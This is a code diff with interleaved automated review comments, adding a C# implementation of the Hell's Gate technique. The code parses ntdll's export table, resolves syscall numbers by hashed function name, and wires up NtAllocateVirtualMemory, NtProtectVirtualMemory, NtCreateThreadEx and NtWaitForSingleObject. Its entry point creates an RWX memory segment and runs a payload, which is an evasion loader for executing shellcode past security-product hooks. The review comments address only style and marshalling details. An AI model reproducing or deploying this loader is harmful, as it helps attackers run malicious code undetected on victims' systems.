|
Util.APITableEntry Entry = new Util.APITableEntry {
|
||||||
|
Hash = FunctionHash
|
||||||
|
};
|
||||||
|
|
||||||
|
for (Int32 cx = 0; cx < this.ModuleExportDirectory.NumberOfNames; cx++) {
|
||||||
|
UInt32 PtrFunctionName = base.ReadPtr32(this.ModuleExportDirectoryAddressNamesOffset + (sizeof(uint) * cx));
|
||||||
|
string FunctionName = base.ReadAscii(this.ConvertRvaToOffset(PtrFunctionName));
|
||||||
|
|
||||||
|
if (FunctionHash == Util.GetFunctionDJB2Hash(FunctionName)) {
|
||||||
|
UInt32 PtrFunctionAdddress = base.ReadPtr32(this.ModuleExportDirectoryAddressFunctionsOffset + (sizeof(uint) * (cx + 1)));
|
||||||
|
Span<byte> opcode = base.GetFunctionOpCode(this.ConvertRvaToOffset(PtrFunctionAdddress));
|
||||||
|
|
||||||
|
if (opcode[3] == 0xb8 && opcode[18] == 0x0f && opcode[19] == 0x05) {
|
||||||
|
Entry.Name = FunctionName;
|
||||||
|
Entry.Address = PtrFunctionAdddress;
|
||||||
|
Entry.Syscall = (Int16)(((byte)opcode[5] << 4) | (byte)opcode[4]);
|
||||||
|
return Entry;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return default;
|
||||||
|
}
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get the offset of a _IMAGE_SECTION_HEADER structure.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="cx">The section to get.</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure.</returns>
|
||||||
|
private Int64 GetModuleSectionOffset(Int16 cx)
|
||||||
|
=> this.ModuleDOSHeader.e_lfanew
|
||||||
|
+ Marshal.SizeOf<Structures.IMAGE_FILE_HEADER>()
|
||||||
|
+ this.ModuleNTHeaders.FileHeader.SizeOfOptionalHeader
|
||||||
|
+ sizeof(Int32) // sizeof(DWORD)
|
||||||
|
+ (Marshal.SizeOf<Structures.IMAGE_SECTION_HEADER>() * cx);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Convert a relative virtual address (RVA) into an offset.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||||
|
/// <param name="SectionHeader">The section in which the relative virtual address (RVA) points to.</param>
|
||||||
|
/// <returns>The offset.</returns>
|
||||||
|
private Int64 ConvertRvaToOffset(Int64 rva, Structures.IMAGE_SECTION_HEADER SectionHeader) => rva - SectionHeader.VirtualAddress + SectionHeader.PointerToRawData;
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Convert a relative virtual address (RVA) into an offset.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA to convert into an offset in the iamge.</param>
|
||||||
|
/// <returns>The offset.</returns>
|
||||||
|
private Int64 ConvertRvaToOffset(Int64 rva) => this.ConvertRvaToOffset(rva, GetSectionByRVA(rva));
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Get which image section is which a relative virtual address (RVA) points to.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="rva">The RVA</param>
|
||||||
|
/// <returns>The _IMAGE_SECTION_HEADER structure</returns>
|
||||||
|
private Structures.IMAGE_SECTION_HEADER GetSectionByRVA(Int64 rva) => this.ModuleSectionHeaders.Where(x => rva > x.VirtualAddress && rva <= x.VirtualAddress + x.SizeOfRawData).First();
|
||||||
|
}
|
||||||
|
}
|
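--- a/Hells Gate/C# Implementation/SharpHellsGate/Program.cs
+++ b/Hells Gate/C# Implementation/SharpHellsGate/Program.cs
@@ -0,0 +1,51 @@
+using System;
+using System.Collections.Generic;
+using SharpHellsGate.Module;
+
+namespace SharpHellsGate {
+
+/// <summary>
+/// Main class.
+/// </summary>
+public class Program {
+
+/// <summary>
+/// Entry point of the program.
+/// </summary>
+/// <param name="args">Command line arguments.</param>
+static void Main(string[] args) {
+Util.LogInfo("Copyright (C) 2020 Paul Laine (@am0nsec)");
+Util.LogInfo("C# Implementation of the Hell's Gate VX Technique");
+Util.LogInfo(" --------------------------------------------------\n", 0, "");
+
+// Only works for x86
+if (IntPtr.Size != 8) {
+Util.LogError("Project only tested in x64 context.\n");
+return;
+}
+
+// Load the module and get everything ready
+SystemModule ntdll = new SystemModule("ntdll.dll");
+ntdll.LoadAllStructures();
+
+// Resolve all the system calls
+Dictionary<UInt64, Util.APITableEntry> APITable = new Dictionary<ulong, Util.APITableEntry>() {
+{ Util.NtAllocateVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtAllocateVirtualMemoryHash) },
+{ Util.NtProtectVirtualMemoryHash, ntdll.GetAPITableEntry(Util.NtProtectVirtualMemoryHash) },
+{ Util.NtCreateThreadExHash, ntdll.GetAPITableEntry(Util.NtCreateThreadExHash) },
+{ Util.NtWaitForSingleObjectHash, ntdll.GetAPITableEntry(Util.NtWaitForSingleObjectHash) }
+};
+ntdll.Dispose();
+
+Util.LogInfo($"NtAllocateVirtualMemory: 0x{APITable[Util.NtAllocateVirtualMemoryHash].Syscall:x4}");
+Util.LogInfo($"NtProtectVirtualMemory: 0x{APITable[Util.NtProtectVirtualMemoryHash].Syscall:x4}");
+Util.LogInfo($"NtWaitForSingleObject: 0x{APITable[Util.NtWaitForSingleObjectHash].Syscall:x4}");
+Util.LogInfo($"NtCreateThreadEx: 0x{APITable[Util.NtCreateThreadExHash].Syscall:x4}\n");
+
+HellsGate gate = new HellsGate(APITable);
+gate.GenerateRWXMemorySegment();
+gate.Payload();
+return;
+}
+}
+}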
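Review bot: The comment `// Only works for x86` above the pointer-size guard contradicts both the `IntPtr.Size != 8` test and the "x64" error text beside it; it should read `// Only works for x64`. The four APITable entries are then used without checking that the lookup succeeded: the GetAPITableEntry body visible at the top of this page ends in `return default;`, so an unresolved export name yields an entry whose Address and Syscall are both zero, and that entry is handed to HellsGate unnoticed. A guard after the dictionary initialiser, `if (APITable.Values.Any(e => e.Address == 0)) { Util.LogError("Unresolved system call."); return; }` (with `using System.Linq;`), would fail early with a clear message instead.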
@ -0,0 +1,18 @@
|
|||||||
|
<Project Sdk="Microsoft.NET.Sdk">
|
||||||
|
|
||||||
|
<PropertyGroup>
|
||||||
|
<OutputType>Exe</OutputType>
|
||||||
|
<TargetFramework>net5.0</TargetFramework>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|AnyCPU'">
|
||||||
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||||
|
<PlatformTarget>x64</PlatformTarget>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|AnyCPU'">
|
||||||
|
<AllowUnsafeBlocks>true</AllowUnsafeBlocks>
|
||||||
|
<PlatformTarget>x64</PlatformTarget>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
</Project>
|
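--- a/Hells Gate/C# Implementation/SharpHellsGate/Util.cs
+++ b/Hells Gate/C# Implementation/SharpHellsGate/Util.cs
@@ -0,0 +1,128 @@
+using System;
+using System.Diagnostics;
+
+namespace SharpHellsGate {
+
+/// <summary>
+/// Util class. Used mainly for debug output.
+/// </summary>
+public class Util {
+
+/// <summary>
+/// Structure used to store the name, address, system call and hash of a native Windows function.
+/// </summary>
+public struct APITableEntry {
+public string Name;
+public Int64 Address;
+public Int16 Syscall;
+public UInt64 Hash;
+}
+
+/// <summary>
+/// DJB2 Hash of the NtAllocateVirtualMemory function name.
+/// </summary>
+public static UInt64 NtAllocateVirtualMemoryHash { get; } = 0xf5bd373480a6b89b;
+
+/// <summary>
+/// DJB2 Hash of the NtProtectVirtualMemory function name.
+/// </summary>
+public static UInt64 NtProtectVirtualMemoryHash { get; } = 0x858bcb1046fb6a37;
+
+/// <summary>
+/// DJB2 Hash of the NtCreateThreadEx function name.
+/// </summary>
+public static UInt64 NtCreateThreadExHash { get; } = 0x64dc7db288c5015f;
+
+/// <summary>
+/// DJB2 Hash of the NtWaitForSingleObject function name.
+/// </summary>
+public static UInt64 NtWaitForSingleObjectHash { get; } = 0xc6a2fa174e551bcb;
+
+
+/// <summary>
+/// Log an informational information.
+/// </summary>
+/// <param name="msg">Message to log.</param>
+/// <param name="indent">Indentation level.</param>
+/// <param name="prefix">Message prefix.</param>
+public static void LogInfo(string msg, int indent = 0, string prefix = "[>]") {
+#if DEBUG
+if (string.IsNullOrEmpty(msg))
+return;
+
+LogMessage(msg, prefix, indent, ConsoleColor.Blue);
+#endif
+}
+
+/// <summary>
+/// Log an error information.
+/// </summary>
+/// <param name="msg">Message to log.</param>
+/// <param name="indent">Indentation level.</param>
+/// <param name="prefix">Message prefix.</param>
+public static void LogError(string msg, int indent = 0, string prefix = "[-]") {
+#if DEBUG
+if (string.IsNullOrEmpty(msg))
+return;
+
+LogMessage(msg, prefix, indent, ConsoleColor.Red);
+#endif
+}
+
+/// <summary>
+/// Log a success information.
+/// </summary>
+/// <param name="msg">Message to log.</param>
+/// <param name="indent">Indentation level.</param>
+/// <param name="prefix">Message prefix</param>
+public static void LogSuccess(string msg, int indent = 0, string prefix = "[+]") {
+#if DEBUG
+if (string.IsNullOrEmpty(msg))
+return;
+
+LogMessage(msg, prefix, indent, ConsoleColor.Green);
+#endif
+}
+
+/// <summary>
+/// Log a string to the console and to the debugger.
+/// </summary>
+/// <param name="msg">Message to log.</param>
+/// <param name="indent">Indentation level.</param>
+/// <param name="prefix">Message prefix.</param>
+/// <param name="color">The color of the prifix on the console.</param>
+private static void LogMessage(string msg, string prefix, int indent, ConsoleColor color) {
+// Indent
+Console.Write(new String(' ', indent));
+Trace.Write(new String(' ', indent));
+
+// Color and prefix
+Trace.Write(prefix);
+Console.ForegroundColor = color;
+Console.Write(prefix);
+Console.ResetColor();
+
+// Message
+Console.WriteLine($" {msg}");
+Trace.WriteLine($" {msg}");
+}
+
+
+/// <summary>
+/// Revisited DJB2 algorithm.
+/// </summary>
+/// <param name="FunctionName">The ASCII name of a function.</param>
+/// <returns>The djb2 hash of the function name.</returns>
+public static UInt64 GetFunctionDJB2Hash(string FunctionName) {
+if (string.IsNullOrEmpty(FunctionName))
+return 0;
+
+UInt64 hash = 0x7734773477347734;
+foreach (char c in FunctionName)
+hash = ((hash << 0x5) + hash) + (byte)c;
+
+return hash;
+}
+
+}
+}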
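Review bot: The bodies of LogInfo, LogError and LogSuccess sit entirely inside `#if DEBUG`, so a Release build prints nothing at all, including the error message that precedes the early return in Program.Main on a non-x64 runtime; either keep LogError outside the conditional or state in the class summary that output exists only in Debug builds. The four hash properties are documented as "DJB2 Hash of ..." while GetFunctionDJB2Hash seeds with `0x7734773477347734` rather than the conventional 5381, so a reader recomputing the values with stock djb2 gets a mismatch; their summaries should say "Revisited DJB2 hash of ..." as the method summary already does. That method's summary should also note that `(byte)c` keeps only the low byte of each UTF-16 code unit, which is fine for the ASCII export names it is meant for. Minor: "Log an informational information." reads awkwardly; "Log an informational message." is clearer, and "prifix" in the LogMessage doc is a typo.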
@ -0,0 +1,93 @@
|
|||||||
|
using System;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Win32 {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Contains all the delegates used to execute the system calls.
|
||||||
|
/// </summary>
|
||||||
|
public class DFunctions {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtAllocateVirtualMemory native Windows function
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">A handle for the process for which the mapping should be done.</param>
|
||||||
|
/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||||
|
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||||
|
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||||
|
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||||
|
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||||
|
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtAllocateVirtualMemory(
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
ref IntPtr BaseAddress,
|
||||||
|
IntPtr ZeroBits,
|
||||||
|
ref IntPtr RegionSize,
|
||||||
|
UInt32 AllocationType,
|
||||||
|
UInt32 Protect
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||||
|
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||||
|
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||||
|
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||||
|
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||||
|
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtProtectVirtualMemory(
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
ref IntPtr BaseAddress,
|
||||||
|
ref IntPtr RegionSize,
|
||||||
|
UInt32 NewProtect,
|
||||||
|
out UInt32 OldProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||||
|
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||||
|
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||||
|
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||||
|
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||||
|
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||||
|
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||||
|
/// <param name="StackZeroBits"></param>
|
||||||
|
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||||
|
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||||
|
/// <param name="lpBytesBuffer"></param>
|
||||||
|
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtCreateThreadEx(
|
||||||
|
ref IntPtr hThread,
|
||||||
|
uint DesiredAccess,
|
||||||
|
IntPtr ObjectAttributes,
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr lpParameter,
|
||||||
|
bool CreateSuspended,
|
||||||
|
uint StackZeroBits,
|
||||||
|
uint SizeOfStackCommit,
|
||||||
|
uint SizeOfStackReserve,
|
||||||
|
IntPtr lpBytesBuffer
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||||
|
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||||
|
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||||
|
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtWaitForSingleObject(
|
||||||
|
IntPtr ObjectHandle,
|
||||||
|
bool Alertable,
|
||||||
|
ref Structures.LARGE_INTEGER TimeOut
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
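Review bot: The NtWaitForSingleObject documentation names the parameter `TimeOuts` while the delegate declares `TimeOut`, states the interval is in microseconds, and says NULL means infinite; the native argument is a pointer to a LARGE_INTEGER in 100-nanosecond units (negative for a relative interval), and because the delegate takes it by `ref` a null pointer cannot be passed, so an infinite wait is not expressible through this signature. Suggested text: `/// <param name="TimeOut">Time-out interval in 100-nanosecond units, negative for a relative interval; cannot be null through this ref parameter.</param>`. Separately, `bool` parameters in a delegate marshal as a 4-byte BOOL by default, whereas the native Alertable is a 1-byte BOOLEAN and NtCreateThreadEx's seventh argument is a ULONG flags word; this works for register-passed x64 arguments in practice, but `[MarshalAs(UnmanagedType.U1)] bool Alertable` and `uint CreateFlags` would match the native prototypes rather than rely on it.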
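--- a/Hells Gate/C# Implementation/SharpHellsGate/Win32/Macros.cs
+++ b/Hells Gate/C# Implementation/SharpHellsGate/Win32/Macros.cs
@@ -0,0 +1,78 @@
+using System;
+
+namespace SharpHellsGate.Win32 {
+
+/// <summary>
+/// Windows Macros used for error and success codes and bitmasks.
+/// </summary>
+public static class Macros {
+
+// NTSTATUS
+public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x3FFFFFFF;
+public static bool NT_INFORMATION(UInt32 ntstatus) => ntstatus >= 0x40000000 && ntstatus <= 0x7FFFFFFF;
+public static bool NT_WARNING(UInt32 ntstatus) => ntstatus >= 0x80000000 && ntstatus <= 0xBFFFFFFF;
+public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000 && ntstatus <= 0xFFFFFFFF;
+
+// Common NTSTATUS
+public static UInt32 STATUS_SUCCESS { get; } = 0x00000000;
+public static UInt32 STATUS_UNSUCCESSFUL { get; } = 0xC0000001;
+public static UInt32 STATUS_NOT_IMPLEMENTED { get; } = 0xC0000002;
+
+// Portable Executable
+public static Int16 IMAGE_DOS_SIGNATURE { get; } = 0x5a00 | 0x4D; // MZ
+public static Int32 IMAGE_NT_SIGNATURE { get; } = 0x00004500 | 0x00000050; // PE00
+
+// Pseudo-Handles
+public static IntPtr GetCurrentProcess() => new IntPtr(-1);
+public static IntPtr GetCurrentThread() => new IntPtr(-2);
+public static IntPtr GetCurrentProcessToken() => new IntPtr(-4);
+public static IntPtr GetCurrentThreadToken() => new IntPtr(-5);
+public static IntPtr GetCurrentThreadEffectiveToken() => new IntPtr(-6);
+
+// Page and Memory permissions
+public static UInt32 PAGE_NOACCESS { get; } = 0x01;
+public static UInt32 PAGE_READONLY { get; } = 0x02;
+public static UInt32 PAGE_READWRITE { get; } = 0x04;
+public static UInt32 PAGE_WRITECOPY { get; } = 0x08;
+public static UInt32 PAGE_EXECUTE { get; } = 0x10;
+public static UInt32 PAGE_EXECUTE_READ { get; } = 0x20;
+public static UInt32 PAGE_EXECUTE_READWRITE { get; } = 0x40;
+public static UInt32 PAGE_EXECUTE_WRITECOPY { get; } = 0x80;
+public static UInt32 PAGE_GUARD { get; } = 0x100;
+public static UInt32 PAGE_NOCACHE { get; } = 0x200;
+public static UInt32 PAGE_WRITECOMBINE { get; } = 0x400;
+public static UInt32 PAGE_GRAPHICS_NOACCESS { get; } = 0x0800;
+public static UInt32 PAGE_GRAPHICS_READONLY { get; } = 0x1000;
+public static UInt32 PAGE_GRAPHICS_READWRITE { get; } = 0x2000;
+public static UInt32 PAGE_GRAPHICS_EXECUTE { get; } = 0x4000;
+public static UInt32 PAGE_GRAPHICS_EXECUTE_READ { get; } = 0x8000;
+public static UInt32 PAGE_GRAPHICS_EXECUTE_READWRITE { get; } = 0x10000;
+public static UInt32 PAGE_GRAPHICS_COHERENT { get; } = 0x20000;
+public static UInt32 PAGE_ENCLAVE_THREAD_CONTROL { get; } = 0x80000000;
+public static UInt32 PAGE_REVERT_TO_FILE_MAP { get; } = 0x80000000;
+public static UInt32 PAGE_TARGETS_NO_UPDATE { get; } = 0x40000000;
+public static UInt32 PAGE_TARGETS_INVALID { get; } = 0x40000000;
+public static UInt32 PAGE_ENCLAVE_UNVALIDATED { get; } = 0x20000000;
+public static UInt32 PAGE_ENCLAVE_DECOMMIT { get; } = 0x10000000;
+public static UInt32 MEM_COMMIT { get; } = 0x00001000;
+public static UInt32 MEM_RESERVE { get; } = 0x00002000;
+public static UInt32 MEM_REPLACE_PLACEHOLDER { get; } = 0x00004000;
+public static UInt32 MEM_RESERVE_PLACEHOLDER { get; } = 0x00040000;
+public static UInt32 MEM_RESET { get; } = 0x00080000 ;
+public static UInt32 MEM_TOP_DOWN { get; } = 0x00100000;
+public static UInt32 MEM_WRITE_WATCH { get; } = 0x00200000;
+public static UInt32 MEM_PHYSICAL { get; } = 0x00400000;
+public static UInt32 MEM_ROTATE { get; } = 0x00800000;
+public static UInt32 MEM_DIFFERENT_IMAGE_BASE_OK { get; } = 0x00800000;
+public static UInt32 MEM_RESET_UNDO { get; } = 0x01000000;
+public static UInt32 MEM_LARGE_PAGES { get; } = 0x20000000;
+public static UInt32 MEM_4MB_PAGES { get; } = 0x80000000;
+public static UInt32 MEM_64K_PAGES { get; } = (MEM_LARGE_PAGES | MEM_PHYSICAL);
+public static UInt32 MEM_UNMAP_WITH_TRANSIENT_BOOST { get; } = 0x00000001;
+public static UInt32 MEM_COALESCE_PLACEHOLDERS { get; } = 0x00000001;
+public static UInt32 MEM_PRESERVE_PLACEHOLDER { get; } = 0x00000002;
+public static UInt32 MEM_DECOMMIT { get; } = 0x00004000;
+public static UInt32 MEM_RELEASE { get; } = 0x00008000;
+public static UInt32 MEM_FREE { get; } = 0x00010000;
+}
+}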
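Review bot: `NT_ERROR`'s upper bound `ntstatus <= 0xFFFFFFFF` is always true for a UInt32, so the predicate reduces to `public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000;`; the tautology is harmless but looks like a copy of the sibling predicates rather than a deliberate range. Style: every constant here is a static get-only property, which cannot appear in a `const` expression, a `switch` case or an attribute argument; `public const UInt32 PAGE_EXECUTE_READWRITE = 0x40;` and friends would be the conventional form. Several entries intentionally share a value (PAGE_TARGETS_NO_UPDATE / PAGE_TARGETS_INVALID, MEM_ROTATE / MEM_DIFFERENT_IMAGE_BASE_OK, MEM_UNMAP_WITH_TRANSIENT_BOOST / MEM_COALESCE_PLACEHOLDERS, and the 0x80000000 pair); a one-line comment such as `// aliases by design, as in winnt.h` would stop a reader from reporting them as typos.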
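--- a/Hells Gate/C# Implementation/SharpHellsGate/Win32/Structures.cs
+++ b/Hells Gate/C# Implementation/SharpHellsGate/Win32/Structures.cs
@@ -0,0 +1,128 @@
+using System;
+using System.Runtime.InteropServices;
+
+namespace SharpHellsGate.Win32 {
+public static class Structures {
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_DOS_HEADER {
+public UInt16 e_magic; /*+0x000*/
+public UInt16 e_cblp; /*+0x002*/
+public UInt16 e_cp; /*+0x004*/
+public UInt16 e_crlc; /*+0x006*/
+public UInt16 e_cparhdr; /*+0x008*/
+public UInt16 e_minalloc; /*+0x00a*/
+public UInt16 e_maxalloc; /*+0x00c*/
+public UInt16 e_ss; /*+0x00e*/
+public UInt16 e_sp; /*+0x010*/
+public UInt16 e_csum; /*+0x012*/
+public UInt16 e_ip; /*+0x014*/
+public UInt16 e_cs; /*+0x016*/
+public UInt16 e_lfarlc; /*+0x018*/
+public UInt16 e_ovno; /*+0x01a*/
+[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
+public UInt16[] e_res; /*+0x01c*/
+public UInt16 e_oemid; /*+0x024*/
+public UInt16 e_oeminfo; /*+0x026*/
+[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
+public UInt16[] e_res2; /*+0x028*/
+public UInt32 e_lfanew; /*+0x03c*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_FILE_HEADER {
+public UInt16 Machine; /*+0x000*/
+public UInt16 NumberOfSections; /*+0x002*/
+public UInt32 TimeDateStamp; /*+0x004*/
+public UInt32 PointerToSymbolTable; /*+0x008*/
+public UInt32 NumberOfSymbols; /*+0x00c*/
+public UInt16 SizeOfOptionalHeader; /*+0x010*/
+public UInt16 Characteristics; /*+0x012*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_DATA_DIRECTORY {
+public UInt32 VirtualAddress; /*+0x000*/
+public UInt32 Size; /*+0x004*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_OPTIONAL_HEADER64 {
+public UInt16 Magic; /*+0x000*/
+public Byte MajorLinkerVersion; /*+0x002*/
+public Byte MinorLinkerVersion; /*+0x003*/
+public UInt32 SizeOfCode; /*+0x004*/
+public UInt32 SizeOfInitializedDatal; /*+0x008*/
+public UInt32 SizeOfUninitializedData; /*+0x00c*/
+public UInt32 AddressOfEntryPoint; /*+0x010*/
+public UInt32 BaseOfCode; /*+0x014*/
+public UInt64 ImageBasel; /*+0x018*/
+public UInt32 SectionAlignment; /*+0x020*/
+public UInt32 FileAlignment; /*+0x024*/
+public UInt16 MajorOperatingSystemVersion; /*+0x028*/
+public UInt16 MinorOperatingSystemVersion; /*+0x02a*/
+public UInt16 MajorImageVersion; /*+0x02c*/
+public UInt16 MinorImageVersion; /*+0x02e*/
+public UInt16 MajorSubsystemVersion; /*+0x030*/
+public UInt16 MinorSubsystemVersion; /*+0x032*/
+public UInt32 Win32VersionValue; /*+0x034*/
+public UInt32 SizeOfImage; /*+0x038*/
+public UInt32 SizeOfHeaders; /*+0x03c*/
+public UInt32 CheckSum; /*+0x040*/
+public UInt16 Subsystem; /*+0x044*/
+public UInt16 DllCharacteristics; /*+0x046*/
+public UInt64 SizeOfStackReserve; /*+0x048*/
+public UInt64 SizeOfStackCommit; /*+0x050*/
+public UInt64 SizeOfHeapReserve; /*+0x058*/
+public UInt64 SizeOfHeapCommit; /*+0x060*/
+public UInt32 LoaderFlags; /*+0x068*/
+public UInt32 NumberOfRvaAndSizes; /*+0x06c*/
+[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
+public IMAGE_DATA_DIRECTORY[] DataDirectory; /*+0x070*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_NT_HEADERS64 {
+public UInt32 Signature; /*+0x000*/
+public IMAGE_FILE_HEADER FileHeader; /*+0x004*/
+public IMAGE_OPTIONAL_HEADER64 OptionalHeader; /*+0x018*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_EXPORT_DIRECTORY {
+public UInt32 Characteristics; /*+0x000*/
+public UInt32 TimeDateStamp; /*+0x004*/
+public UInt16 MajorVersion; /*+0x008*/
+public UInt16 MinorVersion; /*+0x00a*/
+public UInt32 Name; /*+0x00c*/
+public UInt32 Base; /*+0x010*/
+public UInt32 NumberOfFunctions; /*+0x014*/
+public UInt32 NumberOfNames; /*+0x018*/
+public UInt32 AddressOfFunctions; /*+0x01c*/
+public UInt32 AddressOfNames; /*+0x020*/
+public UInt32 AddressOfNameOrdinals; /*+0x024*/
+}
+
+[StructLayout(LayoutKind.Sequential, Pack = 1)]
+public struct IMAGE_SECTION_HEADER {
+[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
+public string Name; /*+0x000*/
+public UInt32 Misc; /*+0x008*/
+public UInt32 VirtualAddress; /*+0x00c*/
+public UInt32 SizeOfRawData; /*+0x010*/
+public UInt32 PointerToRawData; /*+0x014*/
+public UInt32 PointerToRelocations; /*+0x018*/
+public UInt32 PointerToLinenumbers; /*+0x01c*/
+public UInt16 NumberOfRelocations; /*+0x020*/
+public UInt16 NumberOfLinenumbers; /*+0x022*/
+public UInt32 Characteristics; /*+0x024*/
+}
+
+[StructLayout(LayoutKind.Explicit, Size = 1)]
+public struct LARGE_INTEGER {
+[FieldOffset(0)] public Int64 QuadPart; /*+0x000*/
+[FieldOffset(0)] public UInt32 LowPart; /*+0x000*/
+[FieldOffset(4)] public UInt32 HighPart; /*+0x004*/
+}
+}
+}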
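Review bot: `LARGE_INTEGER` is declared with `[StructLayout(LayoutKind.Explicit, Size = 1)]` although its QuadPart field is an Int64 at offset 0; the runtime appears to take the larger of Size and the field extent, so this is likely ignored rather than fatal, but it misleads anyone checking the native layout and should be `[StructLayout(LayoutKind.Explicit, Size = 8)]`. Two field names in IMAGE_OPTIONAL_HEADER64 carry a stray trailing character, `SizeOfInitializedDatal` and `ImageBasel`, and should be `SizeOfInitializedData` and `ImageBase` before other code starts referencing them. `IMAGE_SECTION_HEADER.Misc` is the native union of PhysicalAddress and VirtualSize; a comment such as `/* union: PhysicalAddress / VirtualSize */` would tell readers of GetSectionByRVA (earlier on this page, which bounds by SizeOfRawData) that the in-memory size is available here as well.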
BIN
Hells Gate/HellsGate.pdf
Normal file
BIN
Hells Gate/HellsGate.pdf
Normal file
Binary file not shown.